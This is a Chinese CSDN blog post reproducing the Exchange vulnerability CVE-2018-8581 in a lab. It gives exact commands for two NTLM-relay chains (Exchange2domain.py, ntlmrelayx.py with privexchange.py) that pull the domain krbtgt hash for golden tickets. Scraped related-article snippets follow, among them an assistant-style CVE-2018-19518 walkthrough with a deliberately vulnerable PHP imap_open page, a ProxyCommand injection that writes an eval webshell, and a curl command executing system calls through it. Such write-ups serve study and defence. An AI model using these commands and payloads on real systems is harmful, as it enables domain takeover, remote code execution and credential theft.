CVE-2018-8581复现

最新推荐文章于 2025-03-27 19:44:29 发布
最新推荐文章于 2025-03-27 19:44:29 发布
阅读量1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 内网渗透 文章标签: 安全 csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42255372/article/details/103618358

漏洞描述:

Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又被爆出另外一种攻击方式,可以使用任意域内用户通过NTML Relay获取到krbtgt的hash。该hash可用于制作黄金票据,最后可以达到全域通畅的效果。

影响范围:

Exchange 2010、Exchange 2013、Exchange 2016

漏洞复现:

环境:
DC Windows 2012 (192.168.52.3/ad01.qfdomain.com)
Exchange 2013 Windows 2012 (192.168.52.4/mail.qfdomain.com)
Attack Parrot (192.168.52.101)

攻击方式一:

python Exchange2domain.py -ah 192.168.52.101 -ap 80 -u attack -p "attack" -d qfdomain.com -th 192.168.52.3  192.168.52.4 --no-ssl

一键获取krbtgt的hash

image.png

攻击方式二
一、开启反射监听

 python2 ntlmrelayx.py -t ldap://192.168.52.3 --escalate-user attack

monitor
二、开启攻击

python2 privexchange.py -ah 192.168.52.101 mail.qfdomain.com -u attack -p "attack" -d qfdomain.com --no-ssl --debug

attack
三、如果攻击成功,那么会在我们的监听端看到DC反连我们的信息

image.png

四、拉取HASH

image.png

Exchange SSRF 域内提权漏洞复现(CVE-2018-8581)
谢公子的博客
07-01 4103
漏洞描述 Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又被爆出另外一种攻击方式,可以使用任意域内用户通过NTML Relay来接管域控!攻击者仅需要拥有一个普通域内用户权限即可对存在漏洞的Exchange服务器发起攻击,进而接管域控。 漏洞影响版本 Exchange 2010 ~ Exchange 2016 漏洞过程 Exchange允许任何用户为推送订阅指定所需的URL,服务器将尝试向这个URL发送通知。问题出在Excha...
CVE-2018-8581漏洞复现
whojoe的博客
08-26 1104
CVE-2018-8581漏洞复现环境搭建漏洞复现参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 域控1 ad1.test.com 192.168.164.174 administrator Aa1234 win2012r2 exchange2016-粗1 mail1.test.com 192.168.164.173 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234.
分享几个CVE漏洞复现
最新发布
xnxqwzy的博客
03-27 681
对网站设置域名解析点击此处一个登录界面,发现系统版本,查找历史漏洞,发现一个文件上传RCE漏洞下载下来查看参考文章:https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE可以拿到shell,但是无法切换成交互模式换另一种方式,登录管理面板,密码为维吉尼亚解密密码成功登录,是管理员,点击设置查看进入后台,因为上面搜出来了文件上传RCE漏洞,所以找一找文件上传点发现此处,可以进行文件上传点击该处可以上传先上传一个txt文件试试,上传成功。
Microsoft Exchange漏洞记录(撸向域控) - CVE-2018-8581
dengzhasong7076的博客
01-22 3023
前一段时间exchange出现了CVE-2018-8581,搭了许久的环境,不过不得不敬佩这个漏洞整体超赞。 一开始主要还是利用盗取exchange的管理员权限去调用一些接口,导致可以做到,比如收取别人邮件,替别人发送邮件。 攻击域控 今天出了一个更加深入的利用分析 主要是利用了ews推送的ssrf,进行ntlm relay,从http -> ldap的利用。主要还是exchang...
Microsoft Exchange CVE-2018-8581资源合集(附今日爆款)
blackorbird的博客
01-22 347
近日,Microsoft公告中披露了一则关于Exchange Server的任意用户伪造漏洞Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协...
Microsoft Exchange漏洞分析 - CVE-2018-8581
dengzhasong7076的博客
01-30 1014
此篇为漏洞分析,想看漏洞利用可以点这 前言 前一段时间Exchange出现了CVE-2018-8581漏洞,整个漏洞利用超赞,很值得复现以及分析,因为其中需要的不仅仅是Web方面的,更多还需要Windows相关的安全知识,其中相结合才能达到如此大的危害。 其根本原因由于PushSubscription接口存在SSRF,它允许为任何用户推送订阅所指定的URL,当Exchange尝试连接UR...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CVE-2018-8581 漏洞分析
whojoe的博客
08-27 2780
CVE-2018-8581 漏洞分析前言环境搭建工具分析 前言 这里只是简单分析漏洞产生的代码逻辑,因为不熟悉exchange的业务逻辑,所以分析不会很深入,争取以后慢慢补充 环境搭建 主机 机器名 ip 用户 密码 版本 域控1 ad1.test.com 192.168.164.174 administrator Aa1234 win2012r2 exchange2016-cu11 mail1.test.com 192.168.164.173 administrator Aa1234
EXCHANGE上冒充任意用户--Exchange Server权限提升漏洞(CVE-2018-8581)分析
weixin_30929011的博客
06-18 421
0x00 前言 这是我们2018年Top 5趣案系列中的第三个案例。这些漏洞都有一些因素使它们从今年发布的大约1,400个报告中脱颖而出。今天我们将分析一个Exchange漏洞,它允许任何经过身份验证的用户冒充Exchange Server上的其他用户。 在ZDI的Dustin Childs 12月的文章中,他提到了一个Exchange漏洞,允许Exchange服务器上的任何用户冒充该Exc...
探索CVE-2018-8581:一个深度学习网络安全研究项目
gitblog_00040的博客
03-27 406
探索CVE-2018-8581:一个深度学习网络安全研究项目 去发现同类优质开源项目:https://gitcode.com/ 项目简介 该项目聚焦于2018年发现的一个关键的安全漏洞 CVE-2018-8581。该漏洞主要影响Microsoft SharePoint服务器,允许远程攻击者执行任意代码并获得受感染系统的完全控制权。此开源项目旨在研究这个漏洞的工作原理,并提供一种基于机器学习的检测方...
利用Exchange Server CVE-2018-8581+HASH传递玩爆AD
weixin_33770878的博客
01-29 361
概述微软 Exchange Server于2018年11月份被爆出存在S.S.R.F漏洞,漏洞编号为:CVE-2018-8581,此漏洞微软已推出缓解措施,但是在1月22日又爆出了此漏洞的另一种方法,而利用这种新的方法将为AD带来严重的安全风险,此漏洞在实施微软的缓解措施之后,仍然会被成功attack。 本文将在以下环境中进行模拟演练:1.Exchange2013 CU19(已实施微软推出的缓解措...
Exchange CVE-2018-8581 补丁有用?没用?
weixin_43639741的博客
04-17 726
n1nty@360 A-TEAM 对网络安全只要稍有关注的话应该早就已经知道这个漏洞了。 CVE-2018-8581 TL;DR 漏洞最早由 ZDI 披露,ZDI 发现的 PoC 里面利用此漏洞实现了接管任意人的收件箱的效果。 原理比较简单,该漏洞实质是由 SSRF (Server-Side Request Forgery:服务器端请求伪造)漏洞和其他安全机制相结合造成的。Exchange 允许任...
Exchange Server反序列化漏洞复现(CVE-2020-0688)
谢公子的博客
07-10 2706
漏洞描述: 漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器中以SYSTEM权限远程执行代码。 漏洞影响版本: Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 Microsoft Exchange Serve
漏洞复现-Exchange系列
aming小老弟
02-20 745
Exchage就是我们常说的邮箱服务器。Exchange是由微软推出的用于企业环境中部署的邮件服务器。微软对外发布的第一个Exchange版本是Exchange 4.0,最开始Exchange使用X.400目录服务,随后转向使用微软的活动目录,最开始的时候微软还提供了Microsoft Exchange Client,即Exchange邮件客户端,随后被Outlook取代。
【已复现】Microsoft Exchange Server "OWASSRF" 漏洞安全风险通告
smellycat000的专栏
12-26 2400
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Microsoft Exchange Server是微软公司的一套电子邮件服务组件。除传统的电子邮件的存取、储存、转发功能外,在新版本的产品中亦加入了一系列辅助功能,如语音邮件、邮件过滤筛选和OWA(基于Web的电子邮件存取)。近日,奇安信CERT监测到CrowdStrike发布针对Microsoft Exchange...
cve-2018-19518 复现
03-21
<think>好的,用户想要复现CVE-2018-19518漏洞。首先我需要回忆这个漏洞的具体情况。根据引用中的信息,这个漏洞与PHP的imap扩展有关,存在远程命令执行的可能。用户提供的引用[2]提到初始界面是邮箱登录,有三个参数:邮箱、账号、密码,这可能涉及到利用IMAP协议处理时的漏洞。 首先,我需要确定漏洞的原理。CVE-2018-19518是由于PHP的imap_open函数未正确过滤传入的参数,导致攻击者可以注入恶意命令。引用[4]和[5]提到发送特定的EXP来利用,比如在邮箱地址参数中插入管道符号执行系统命令。例如,构造邮箱参数为“vulnerable -oProxyCommand=echo...”,这样imap_open在处理时会执行该命令。 接下来是复现步骤。根据引用[5],复现环境需要PHP安装了imap扩展,并且存在漏洞版本(PHP 5.x到7.x某些版本)。搭建一个简单的PHP页面,使用imap_open函数连接邮箱服务器。攻击者可以在邮箱地址处注入恶意命令,比如执行echo写入webshell到服务器,如生成e.php文件。然后通过访问该文件,使用POST参数1执行任意命令。 此外,用户可能需要搭建测试环境,比如使用Docker容器来配置PHP和imap扩展,确保环境隔离。同时,需要注意漏洞利用的具体参数构造,以及如何绕过可能的过滤措施。引用中提到的Repeater模块发送EXP,可能是指使用Burp Suite等工具拦截请求并修改参数,插入恶意代码。 最后,生成相关问题时需要考虑用户可能的后续需求,比如环境搭建的详细步骤、漏洞原理的深入解释、其他相关漏洞的关联,以及如何防御此类攻击。需要确保回答结构清晰,步骤明确,并且提醒用户合法授权的重要性,避免法律风险。</think>### CVE-2018-19518漏洞复现步骤 #### 1. 漏洞背景 CVE-2018-19518是PHP的`imap_open`函数因未正确过滤用户输入导致的远程命令执行漏洞。攻击者可通过构造恶意邮箱参数注入系统命令,实现任意代码执行[^4][^5]。 #### 2. 环境准备 - **漏洞环境**:PHP 5.x/7.x(需启用`imap`扩展),例如: ```bash docker run -d -p 80:80 --name vuln_env php:5.6-apache docker exec vuln_env apt-get update && docker exec vuln_env apt-get install -y libc-client-dev libkrb5-dev && docker exec vuln_env docker-php-ext-configure imap --with-kerberos --with-imap-ssl && docker exec vuln_env docker-php-ext-install imap ``` - **靶场代码**:创建`index.php`文件,内容如下: ```php <?php $server = $_POST['server']; $user = $_POST['user']; $pass = $_POST['pass']; $mbox = imap_open("{" . $server . "}INBOX", $user, $pass); imap_close($mbox); ?> ``` #### 3. 漏洞利用 1. **构造恶意请求**:通过`ProxyCommand`参数注入命令。例如写入Webshell: ```bash # 邮箱服务器参数注入(示例) server=localhost:143/user=test/password=test -oProxyCommand=echo '<?php eval($_POST[1]);' > /var/www/html/e.php ``` - 使用Burp Suite或Postman发送POST请求,参数中插入上述payload[^5]。 2. **验证利用结果**: - 访问`http://目标IP/e.php`,通过POST参数`1`执行命令: ```bash curl -X POST -d "1=system('id');" http://目标IP/e.php ``` - 若返回当前用户权限信息,则漏洞利用成功。 #### 4. 防御建议 - 升级PHP至安全版本(>=7.2.15或>=7.3.2)。 - 禁用`imap`扩展或过滤用户输入中的特殊字符(如`()`、反引号、`|`等)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值